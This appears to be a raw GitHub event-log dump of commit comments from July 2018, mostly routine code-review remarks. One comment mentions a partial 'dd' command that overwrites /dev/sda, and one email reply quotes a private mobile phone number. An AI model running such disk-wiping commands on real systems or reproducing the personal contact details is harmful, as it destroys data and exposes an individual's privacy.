Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T19:02:45Z"}
{"id":"7908404714","type":"CommitCommentEvent","actor":{"login":"thomas-mc-work"},"repo":{"name":"LineageOS/hudson"},"payload":{"comment":{"id":29570865,"position":null,"line":null,"path":null,"commit_id":"5b8b352a15fc1bbfa87dc39c41269e4394053ac6","created_at":"2018-07-02T19:02:53Z","updated_at":"2018-07-02T19:02:53Z","author_association":"NONE","body":"Who is the maintainer?"}},"created_at":"2018-07-02T19:02:53Z"}
{"id":"7908406256","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570872,"position":9,"line":9,"path":"src/js/views/MessageView.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:03:15Z","updated_at":"2018-07-02T19:03:15Z","author_association":"NONE","body":"Pelo que eu vi, o default é info. Se vc mandar um:\r\n```js\r\nconst templateTypes = ['success', 'info', 'danger', 'warning'];\r\nconst templateType = templateTypes.includes(model.type) ? model.type : 'info';\r\n```\r\n\r\naí vc pode retornar o template direto assim e sumir com esse switch (odeio switch e vou tirar todos que eu puder)\r\n\r\n```js\r\nreturn `<div class=\"alert alert-${templateType}\" role=\"alert\">${model.message}</div>`;\r\n```"}},"created_at":"2018-07-02T19:03:15Z"}
{"id":"7908406637","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"dhall-lang/dhall-nix"},"payload":{"comment":{"id":29570873,"position":7,"line":33,"path":"dhall-nix.cabal","commit_id":"4c7e66bb6a39eaf9c2b888cb51a30965a88d7c75","created_at":"2018-07-02T19:03:20Z","updated_at":"2018-07-02T19:03:20Z","author_association":"NONE","body":"nixpkgs haskell packages latest stackage snapshot, so `haskellPackages.dhall` is https://www.stackage.org/lts-11.16/package/dhall-1.11.1\r\n\r\nIn case of dhall it's long behind so I pushed https://github.com/NixOS/nixpkgs/commit/a260b3d681164bedaeb90fd578390147799d638c to fix that.\r\n"}},"created_at":"2018-07-02T19:03:20Z"}
{"id":"7908409799","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570880,"position":166,"line":127,"path":"src/System.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T19:04:04Z","updated_at":"2018-07-02T19:04:04Z","author_association":"COLLABORATOR","body":"Это больше для документации. Чтобы в теле основной программы четко было видно, какие пины задействованы. Наглядно же..."}},"created_at":"2018-07-02T19:04:04Z"}
{"id":"7908411029","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29570885,"position":null,"line":null,"path":null,"commit_id":"dd649f9d973fd3889aed431066c6d69be87e145f","created_at":"2018-07-02T19:04:21Z","updated_at":"2018-07-02T19:04:21Z","author_association":"COLLABORATOR","body":"and all because git wanted an anonymized email address\r\nresulting in the push being rejected by remote\r\nscrew this and pass a beer"}},"created_at":"2018-07-02T19:04:21Z"}
{"id":"7908411803","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29570890,"position":null,"line":null,"path":null,"commit_id":"cb51b446243a1c10f3bf2ac804ee5a1f05391732","created_at":"2018-07-02T19:04:33Z","updated_at":"2018-07-02T19:04:33Z","author_association":"CONTRIBUTOR","body":"ups, sorry!"}},"created_at":"2018-07-02T19:04:33Z"}
{"id":"7908413062","type":"CommitCommentEvent","actor":{"login":"RomainOC"},"repo":{"name":"Seiph59/Pharmacie"},"payload":{"comment":{"id":29570895,"position":94,"line":94,"path":"Pharmacie.py","commit_id":"f06e5a70dbbc14dc9ed8cdcce0c1913455a12076","created_at":"2018-07-02T19:04:50Z","updated_at":"2018-07-02T19:04:50Z","author_association":"NONE","body":"A plusieurs endroits tu parcours tous les médicaments pour en trouver un. Que peux tu faire pour éviter d'avoir plusieurs fois le même code dans ton fichier ?"}},"created_at":"2018-07-02T19:04:50Z"}
{"id":"7908415374","type":"CommitCommentEvent","actor":{"login":"MaximilianLiehr"},"repo":{"name":"wilkieolin/RRAM"},"payload":{"comment":{"id":29570903,"position":null,"line":null,"path":null,"commit_id":"f867c3e7c999c788cd8233d903ef1dbda89c2de7","created_at":"2018-07-02T19:05:21Z","updated_at":"2018-07-02T19:05:21Z","author_association":"COLLABORATOR","body":"Just a test comment!"}},"created_at":"2018-07-02T19:05:21Z"}
{"id":"7908418170","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29570913,"position":null,"line":null,"path":null,"commit_id":"cb724b65cc9bb87551f2b4f502ca5c1c5a180a54","created_at":"2018-07-02T19:06:00Z","updated_at":"2018-07-02T19:06:00Z","author_association":"COLLABORATOR","body":"btw no idea why all this stuff was removed from MainWindow.fxml\r\nI swear I didn't do that\r\nrasple, could you add that back in if it breaks the project?"}},"created_at":"2018-07-02T19:06:00Z"}
{"id":"7908421770","type":"CommitCommentEvent","actor":{"login":"GautamGupta"},"repo":{"name":"uwblueprint/website"},"payload":{"comment":{"id":29570927,"position":4,"line":25,"path":"src/app/projects-page/projects-page.component.html","commit_id":"ef8fa7a88a7db393d0c6f23f98c0b5bf6cf630f4","created_at":"2018-07-02T19:06:51Z","updated_at":"2018-07-02T19:06:51Z","author_association":"MEMBER","body":"Should we move these to past projects?"}},"created_at":"2018-07-02T19:06:51Z"}
{"id":"7908424199","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29570935,"position":null,"line":null,"path":null,"commit_id":"cb724b65cc9bb87551f2b4f502ca5c1c5a180a54","created_at":"2018-07-02T19:07:28Z","updated_at":"2018-07-02T19:07:28Z","author_association":"COLLABORATOR","body":"oh wait, it just rearranged them into a single line like a total derp\r\nnevermind then\r\n(I swear I'm not drunk)"}},"created_at":"2018-07-02T19:07:28Z"}
{"id":"7908427269","type":"CommitCommentEvent","actor":{"login":"RomainOC"},"repo":{"name":"Seiph59/Pharmacie"},"payload":{"comment":{"id":29570941,"position":85,"line":85,"path":"Pharmacie.py","commit_id":"f06e5a70dbbc14dc9ed8cdcce0c1913455a12076","created_at":"2018-07-02T19:08:16Z","updated_at":"2018-07-02T19:08:16Z","author_association":"NONE","body":"Tu appelles deux fois de suite `lireClient`"}},"created_at":"2018-07-02T19:08:16Z"}
{"id":"7908427519","type":"CommitCommentEvent","actor":{"login":"ppmazala"},"repo":{"name":"ppmazala/Test"},"payload":{"comment":{"id":29570942,"position":null,"line":null,"path":null,"commit_id":"5bcf6800e40f1ca86e6271b476f3882781aad442","created_at":"2018-07-02T19:08:19Z","updated_at":"2018-07-02T19:08:19Z","author_association":"OWNER","body":"This is nice"}},"created_at":"2018-07-02T19:08:19Z"}
{"id":"7908430206","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570949,"position":29,"line":29,"path":"index.html","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:09:00Z","updated_at":"2018-07-02T19:09:00Z","author_association":"OWNER","body":"A ideia inicial era fazer algo similar ao que o [Angular](https://angular.io/guide/user-input) fez ou até mesmo o que o [Vue](https://vuejs.org/v2/guide/events.html) fez, se tratando de eventos. Teoricamente, colocar bind dentro de um arquivo JS iria ser um pouco diferente dessa implementação de alguns frameworks famosos? Essa implementação seria fazer algo similar como o jQuery manipula os eventos?\r\n\r\nA ideia no futuro é acrescentar o conceito das diretivas utilizados por muitos frameworks, porém isso tem que ser melhor pensado.\r\n "}},"created_at":"2018-07-02T19:09:00Z"}
{"id":"7908431201","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29570954,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-02T19:09:15Z","updated_at":"2018-07-02T19:09:15Z","author_association":"NONE","body":"@AArnott where were you even specifying ARM64 such that the missing package was an issue?  I'm curious since there may be better workarounds that don't involve building for a RID you likely don't care about and pulling down a package that you'll never use ;)"}},"created_at":"2018-07-02T19:09:15Z"}
{"id":"7908432019","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570957,"position":4,"line":3,"path":"src/js/controllers/TodoController.js","commit_id":"07d5699eaf221e774654d43f37c02a6824938576","created_at":"2018-07-02T19:09:26Z","updated_at":"2018-07-02T19:09:26Z","author_association":"NONE","body":"poderia ser usado o destructuring direto na assinatura do construtor:\r\n\r\n`constructor({input, container})`"}},"created_at":"2018-07-02T19:09:26Z"}
{"id":"7908432662","type":"CommitCommentEvent","actor":{"login":"naga-anjaneyulu"},"repo":{"name":"naga-anjaneyulu/Machine_Learning"},"payload":{"comment":{"id":29570959,"position":null,"line":null,"path":null,"commit_id":"52a3b3bdf5ef4ab71b61f69b3d1a4e241b3f0e85","created_at":"2018-07-02T19:09:36Z","updated_at":"2018-07-02T19:09:36Z","author_association":"OWNER","body":"Renaming"}},"created_at":"2018-07-02T19:09:36Z"}
{"id":"7908433202","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570961,"position":40,"line":40,"path":"index.html","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:09:42Z","updated_at":"2018-07-02T19:09:42Z","author_association":"OWNER","body":"Boa ideia, vou implementar isso! "}},"created_at":"2018-07-02T19:09:42Z"}
{"id":"7908433318","type":"CommitCommentEvent","actor":{"login":"zfigura"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29570962,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-02T19:09:44Z","updated_at":"2018-07-02T19:09:44Z","author_association":"MEMBER","body":"Thanks. I've just pushed 51b6a46ce08930a9fef6f13ca8f4cda2095cbd37; please let us know if that fixes the build."}},"created_at":"2018-07-02T19:09:44Z"}
{"id":"7908434074","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29570965,"position":16,"line":24,"path":"tests/qgraph/libqgraph-main.c","commit_id":"84315f1a16962a2305879f4cae2bdd73ea2934e0","created_at":"2018-07-02T19:09:56Z","updated_at":"2018-07-02T19:09:56Z","author_association":"OWNER","body":"As you have seen, I fixed it in later commit. "}},"created_at":"2018-07-02T19:09:56Z"}
{"id":"7908439976","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29570973,"position":93,"line":127,"path":"tests/qgraph/libqgraph-main.c","commit_id":"84315f1a16962a2305879f4cae2bdd73ea2934e0","created_at":"2018-07-02T19:11:28Z","updated_at":"2018-07-02T19:11:28Z","author_association":"OWNER","body":"I am going to explain it in next commit, where I cleaned up a little"}},"created_at":"2018-07-02T19:11:28Z"}
{"id":"7908440129","type":"CommitCommentEvent","actor":{"login":"naga-anjaneyulu"},"repo":{"name":"naga-anjaneyulu/Machine_Learning"},"payload":{"comment":{"id":29570974,"position":null,"line":null,"path":null,"commit_id":"3a907e7a7064ea008feb1a3927d4d350ce7b48af","created_at":"2018-07-02T19:11:30Z","updated_at":"2018-07-02T19:11:30Z","author_association":"OWNER","body":"Rename"}},"created_at":"2018-07-02T19:11:30Z"}
{"id":"7908441321","type":"CommitCommentEvent","actor":{"login":"naga-anjaneyulu"},"repo":{"name":"naga-anjaneyulu/Machine_Learning"},"payload":{"comment":{"id":29570979,"position":null,"line":null,"path":null,"commit_id":"3a907e7a7064ea008feb1a3927d4d350ce7b48af","created_at":"2018-07-02T19:11:49Z","updated_at":"2018-07-02T19:11:49Z","author_association":"OWNER","body":"Renamed"}},"created_at":"2018-07-02T19:11:49Z"}
{"id":"7908443243","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29570985,"position":null,"line":null,"path":null,"commit_id":"1883b2e383c6ca691950e516d140e05cdf001088","created_at":"2018-07-02T19:12:18Z","updated_at":"2018-07-02T19:12:18Z","author_association":"CONTRIBUTOR","body":"Typo, update #2739"}},"created_at":"2018-07-02T19:12:18Z"}
{"id":"7908446452","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570991,"position":69,"line":40,"path":"src/System.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T19:13:08Z","updated_at":"2018-07-02T19:13:08Z","author_association":"COLLABORATOR","body":"Переименовал"}},"created_at":"2018-07-02T19:13:08Z"}
{"id":"7908449577","type":"CommitCommentEvent","actor":{"login":"AnHardt"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29570993,"position":null,"line":null,"path":null,"commit_id":"91ae9d12d682e7fbc745e52b43c546d95bef79b8","created_at":"2018-07-02T19:13:53Z","updated_at":"2018-07-02T19:13:53Z","author_association":"CONTRIBUTOR","body":"Likely is measuring the hysteresis of the switch."}},"created_at":"2018-07-02T19:13:53Z"}
{"id":"7908453344","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29571006,"position":null,"line":null,"path":null,"commit_id":"d4aba1f718c5def84bc62e35517eba7b55e46e00","created_at":"2018-07-02T19:14:49Z","updated_at":"2018-07-02T19:14:49Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-234](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-234).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-234-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-02T19:14:49Z"}
{"id":"7908453514","type":"CommitCommentEvent","actor":{"login":"hallek7"},"repo":{"name":"Syeda03/hhjss"},"payload":{"comment":{"id":29571007,"position":null,"line":null,"path":null,"commit_id":"8699a7bfb9d3e5a7f8bf7e96eb5ca1d0e74080c7","created_at":"2018-07-02T19:14:51Z","updated_at":"2018-07-02T19:14:51Z","author_association":"COLLABORATOR","body":". added footer:   \" &#169; University of Minnesota Coding Bootcamp. HHJSS Group Project 07/2018\"\r\n.  placed the drop down within the header, eliminated the navbar & the quote - to help overlapping when screen is resized \r\n. also readjusted header's top and bottom margins , in order detach the homepage picture from the header  "}},"created_at":"2018-07-02T19:14:51Z"}
{"id":"7908454189","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29571008,"position":82,"line":52,"path":"src/System.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T19:15:02Z","updated_at":"2018-07-02T19:15:02Z","author_association":"COLLABORATOR","body":"Ага, Ваш вариант из бранча лично для меня выглядит хоть и неидеально, но вполне приемлемо. Я предлагаю сначала добиться, чтобы все работало, а там можно будет как-нибудь улучшить код. "}},"created_at":"2018-07-02T19:15:02Z"}
{"id":"7908454350","type":"CommitCommentEvent","actor":{"login":"jamessan"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29571011,"position":5,"line":205,"path":"src/nvim/tui/tui.c","commit_id":"4a83b64777b22933de186665ddb4d0570675c667","created_at":"2018-07-02T19:15:05Z","updated_at":"2018-07-02T19:15:05Z","author_association":"MEMBER","body":"We're using `term` in lots of places below.  Should they be using `termname` instead?"}},"created_at":"2018-07-02T19:15:05Z"}
{"id":"7908456506","type":"CommitCommentEvent","actor":{"login":"rahul003"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29571015,"position":46,"line":87,"path":"example/image-classification/benchmark_score.py","commit_id":"99af59beeb5ea480487575bb06371cc85a35fc21","created_at":"2018-07-02T19:15:37Z","updated_at":"2018-07-02T19:15:37Z","author_association":"CONTRIBUTOR","body":"sorry, fixing it"}},"created_at":"2018-07-02T19:15:37Z"}
{"id":"7908458989","type":"CommitCommentEvent","actor":{"login":"DavidTanner"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29571019,"position":15,"line":77,"path":"spring-beans/src/main/java/org/springframework/beans/factory/support/DefaultSingletonBeanRegistry.java","commit_id":"8a56db6e4ebc2db71fc0524bbeea22b7acae7d2a","created_at":"2018-07-02T19:16:14Z","updated_at":"2018-07-02T19:16:14Z","author_association":"NONE","body":"This change breaks the AbstractBeanFactory in several places, making 5.0.7 unusable."}},"created_at":"2018-07-02T19:16:14Z"}
{"id":"7908459208","type":"CommitCommentEvent","actor":{"login":"Amid198"},"repo":{"name":"ContributorCovenant/contributor_covenant"},"payload":{"comment":{"id":29571020,"position":null,"line":null,"path":null,"commit_id":"d09db2e0c9ba29a6ad70ed1fd4ca58effa3198c9","created_at":"2018-07-02T19:16:17Z","updated_at":"2018-07-02T19:16:17Z","author_association":"NONE","body":"d09db2e"}},"created_at":"2018-07-02T19:16:17Z"}
{"id":"7908465025","type":"CommitCommentEvent","actor":{"login":"thjnhcolag"},"repo":{"name":"thjnhcolag/ripplecharts-frontend"},"payload":{"comment":{"id":29571025,"position":null,"line":null,"path":null,"commit_id":"d7a5236b89aefe52d22d2839f3868919919bebc5","created_at":"2018-07-02T19:17:41Z","updated_at":"2018-07-02T19:17:41Z","author_association":"OWNER","body":"#"}},"created_at":"2018-07-02T19:17:41Z"}
{"id":"7908465272","type":"CommitCommentEvent","actor":{"login":"githubsaturn"},"repo":{"name":"githubsaturn/captainduckduck"},"payload":{"comment":{"id":29571026,"position":19,"line":175,"path":"website/pages/en/index.js","commit_id":"3bba9e98878da5ff9685ee2c16aace1bd234a1b0","created_at":"2018-07-02T19:17:45Z","updated_at":"2018-07-02T19:17:45Z","author_association":"OWNER","body":"Thanks! Fixed."}},"created_at":"2018-07-02T19:17:45Z"}
{"id":"7908466947","type":"CommitCommentEvent","actor":{"login":"marcio-ao"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29571030,"position":null,"line":null,"path":null,"commit_id":"91ae9d12d682e7fbc745e52b43c546d95bef79b8","created_at":"2018-07-02T19:18:10Z","updated_at":"2018-07-02T19:18:10Z","author_association":"CONTRIBUTOR","body":"@AnHardt: Interesting point. But if the approach to the endstop is slow enough that it just barely makes contact, couldn't it work? Generally if the HOME_BUMP_MM variables are set, there is a slow approach to the switch."}},"created_at":"2018-07-02T19:18:10Z"}
{"id":"7908468822","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29571032,"position":null,"line":null,"path":null,"commit_id":"fe9f4abec29b5b4bfe1742658f421642b35c3860","created_at":"2018-07-02T19:18:38Z","updated_at":"2018-07-02T19:18:38Z","author_association":"CONTRIBUTOR","body":"@matthewbauer I'd try reverting it, except that without this change I get failures trying to build libsecurity."}},"created_at":"2018-07-02T19:18:38Z"}
{"id":"7908475114","type":"CommitCommentEvent","actor":{"login":"jmtucker7"},"repo":{"name":"jmtucker7/JavaScript_Solutions"},"payload":{"comment":{"id":29571040,"position":null,"line":null,"path":null,"commit_id":"fde3ea864f651433f8b37742a25e7843725e8766","created_at":"2018-07-02T19:20:07Z","updated_at":"2018-07-02T19:20:07Z","author_association":"OWNER","body":"I do not know Java, but I think there would likely be a version of this online someplace if you Google it."}},"created_at":"2018-07-02T19:20:07Z"}
{"id":"7908476110","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29571042,"position":null,"line":null,"path":null,"commit_id":"fe9f4abec29b5b4bfe1742658f421642b35c3860","created_at":"2018-07-02T19:20:21Z","updated_at":"2018-07-02T19:20:21Z","author_association":"MEMBER","body":"Oops i meant removing this line:\r\n\r\nhttps://github.com/NixOS/nixpkgs/blob/master/pkgs/os-specific/darwin/apple-sdk/default.nix#L30\r\n\r\nSo that there is only one output - everything else should evaluate the same."}},"created_at":"2018-07-02T19:20:21Z"}
{"id":"7908477942","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29571045,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T19:20:46Z","updated_at":"2018-07-02T19:20:46Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1677 of 1677 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.33%25-green.png)</a>\n"}},"created_at":"2018-07-02T19:20:46Z"}
{"id":"7908478111","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29571046,"position":null,"line":null,"path":null,"commit_id":"dcf406ea7fddda804496950022dc37fc61425c6c","created_at":"2018-07-02T19:20:48Z","updated_at":"2018-07-02T19:20:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-101](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-101).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-101-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-02T19:20:48Z"}
{"id":"7908480880","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29571051,"position":null,"line":null,"path":null,"commit_id":"8fb0d6da7b81992443aafc114acda9ab5e50dde4","created_at":"2018-07-02T19:21:28Z","updated_at":"2018-07-02T19:21:28Z","author_association":"CONTRIBUTOR","body":"Still, I don't know what is the purpose of this file, adding new channel parameters ?\r\nMaybe we can add this file into firmware package ...\r\n"}},"created_at":"2018-07-02T19:21:28Z"}
{"id":"7908489686","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29571071,"position":null,"line":null,"path":null,"commit_id":"dff33a44bfcfa692030fb0cf6dfacd81c1a45683","created_at":"2018-07-02T19:23:38Z","updated_at":"2018-07-02T19:23:38Z","author_association":"NONE","body":"Let your current LTC [-3, 1] finish first.\r\nThen test the ps_kngring2 against ps_kingring.\r\n\r\nAs it is, you are testing 2 changes at the same time. "}},"created_at":"2018-07-02T19:23:38Z"}
{"id":"7908491600","type":"CommitCommentEvent","actor":{"login":"engenegr"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29571073,"position":19,"line":375,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T19:24:04Z","updated_at":"2018-07-02T19:24:04Z","author_association":"OWNER","body":"Есть русский термин. https://ru.wikipedia.org/wiki/%D0%90%D1%82%D0%B0%D0%BA%D0%B0_%D0%BF%D0%BE%D0%B2%D1%82%D0%BE%D1%80%D0%BD%D0%BE%D0%B3%D0%BE_%D0%B2%D0%BE%D1%81%D0%BF%D1%80%D0%BE%D0%B8%D0%B7%D0%B2%D0%B5%D0%B4%D0%B5%D0%BD%D0%B8%D1%8F \r\nМожем оставить так. Я не соглашусь, что все представляют, часто наблюдаю, люди базовых вещей не знают."}},"created_at":"2018-07-02T19:24:04Z"}
{"id":"7908495572","type":"CommitCommentEvent","actor":{"login":"engenegr"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29571083,"position":23,"line":379,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T19:24:59Z","updated_at":"2018-07-02T19:24:59Z","author_association":"OWNER","body":"Ок"}},"created_at":"2018-07-02T19:24:59Z"}
{"id":"7908496991","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29571084,"position":109,"line":116,"path":"tests/qgraph/libqgraph-main.c","commit_id":"75df548a9e15f924f7a783bf2cbf2ee5837811ca","created_at":"2018-07-02T19:25:21Z","updated_at":"2018-07-02T19:25:21Z","author_association":"OWNER","body":"This is the order of events:\r\n**walk_path():**\r\n`read_only_path[0] = \"x86_64/pc\"` (arch)\r\n`read_only_path[1] = \"pc\"` (machine)\r\n`...` rest of the path\r\n`str_path = g_strjoinv(\"/\", read_only_path+1);` builds `\"pc/...\"`\r\n`cmd_line = g_strjoinv(\" \", read_only_cmd_line);` builds `\"-M pc ...\"`\r\n`read_only_path[0] = cmd_line;` now in position 0 there is the command line\r\n`read_only_path[1] = arch;` now in position 1 there is `\"x86_64/pc\"`\r\n`qtest_add_data_func(str_path, read_only_path, allocate_objects);` builds the test \"/x86_64/pc/...\"\r\n**allocate_objects():**\r\nloads command line with read_only_path[0]\r\nuses the rest of indexes (1...) as node strings"}},"created_at":"2018-07-02T19:25:21Z"}
{"id":"7908497150","type":"CommitCommentEvent","actor":{"login":"prudho"},"repo":{"name":"ColinFrick/Fomantic-UI"},"payload":{"comment":{"id":29571085,"position":13,"line":1028,"path":"src/definitions/modules/search.js","commit_id":"4d70a5aed8607ac7e1ce64653334dda75ebba20a","created_at":"2018-07-02T19:25:24Z","updated_at":"2018-07-02T19:25:24Z","author_association":"NONE","body":"```js\r\nheader = header || error.noResultsHeader;\r\n```"}},"created_at":"2018-07-02T19:25:24Z"}
{"id":"7908501305","type":"CommitCommentEvent","actor":{"login":"AArnott"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29571091,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-02T19:26:25Z","updated_at":"2018-07-02T19:26:25Z","author_association":"OWNER","body":"I never specify ARM anywhere in my repo. That I think is part of the issue behind all the complaints customers have been making about this issue."}},"created_at":"2018-07-02T19:26:25Z"}
{"id":"7908513209","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29571125,"position":null,"line":null,"path":null,"commit_id":"dff33a44bfcfa692030fb0cf6dfacd81c1a45683","created_at":"2018-07-02T19:29:17Z","updated_at":"2018-07-02T19:29:17Z","author_association":"OWNER","body":"I didn't think they were related, but no problem.\n\nOn Mon, Jul 2, 2018 at 1:23 PM, Rocky640 <notifications@github.com> wrote:\n\n> Let your current LTC [-3, 1] finish first.\n> Then test the ps_kngring2 against ps_kingring.\n>\n> As it is, you are testing 2 changes at the same time.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/dff33a44bfcfa692030fb0cf6dfacd81c1a45683#commitcomment-29571071>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSEe4oSNLGyL2IWvYgq2wy5uBcyICks5uCnM6gaJpZM4U_0Xn>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-02T19:29:17Z"}
{"id":"7908527216","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29571157,"position":null,"line":null,"path":null,"commit_id":"2747fbeb522fa6b8fd3c707d4d84b1139f31c09e","created_at":"2018-07-02T19:32:41Z","updated_at":"2018-07-02T19:32:41Z","author_association":"COLLABORATOR","body":"@Fourdee\ndd ... of=/dev/sda ... does not work to remove all partitions + partition table at once?"}},"created_at":"2018-07-02T19:32:41Z"}
{"id":"7908531007","type":"CommitCommentEvent","actor":{"login":"sargun"},"repo":{"name":"Netflix/titus-executor"},"payload":{"comment":{"id":29571170,"position":53,"line":132,"path":"uploader/s3.go","commit_id":"0089b759659161d061da3b83e14609683a398090","created_at":"2018-07-02T19:33:40Z","updated_at":"2018-07-02T19:33:40Z","author_association":"CONTRIBUTOR","body":"Maybe successfullyUploadedBytes and report bytes?"}},"created_at":"2018-07-02T19:33:40Z"}
{"id":"7908532856","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29571174,"position":null,"line":null,"path":null,"commit_id":"cb51b446243a1c10f3bf2ac804ee5a1f05391732","created_at":"2018-07-02T19:34:08Z","updated_at":"2018-07-02T19:34:08Z","author_association":"MEMBER","body":"@alium \r\n\r\nCan you come in irc? Need you to generate a token."}},"created_at":"2018-07-02T19:34:08Z"}
